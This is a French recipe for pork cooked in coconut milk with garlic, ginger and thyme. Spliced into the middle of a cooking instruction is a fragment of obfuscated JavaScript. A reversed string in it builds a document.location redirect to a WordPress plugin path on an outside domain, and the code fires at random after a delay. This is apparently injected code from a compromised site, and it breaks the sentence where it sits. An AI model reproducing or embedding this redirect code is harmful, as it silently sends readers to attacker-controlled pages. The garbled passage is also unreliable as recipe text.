Temps de préparation : 20 minutes
Temps de cuisson : 60 minutes
Ingrédients (pour 6 personnes) :
– 1kg de porc désossé (échine, filet…)
– 50 cl de lait de coco
– 1 gros oignon
– 3 gousses d’ail
– 1 petit morceau de gingembre
– 1 branche de thym
– muscade rapée
– 1 tablette de bouillon cube
– 1 morceau de sucre
– 2 cuillère à soupe de sucre
– sel et poivre
Préparation de la recette :
Coupez le porc en petits cubes.Epluchez l’ail, l’oignon et le gingembre. Hachez l’oignon et l’ail. Râpez le gingembre.
Mettez l’ail, l’oignon et le gingembre dans un grand plat creux. Ajoutez le thym, une pincée de muscade, de sel et de poivre. Mélangez et faites-y mariner les cubes de porc pendant 30 minutes au réfrigérateur.
Faites revenir la viande dans une cocotte en remuant, jusqu’à ce qu’elle soit bien dorer sur toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toutes les faces. Emiettez la tablette de bouillon et ajoutez-la à la viande, ainsi que le lait de coco et le sucre. Couvrer et laissez cuire pendant 1 heure à feu doux.
Lorsque la viande est tendre, rectifiez-en l’assaisonnement. Servez avec du riz blanc parfumé.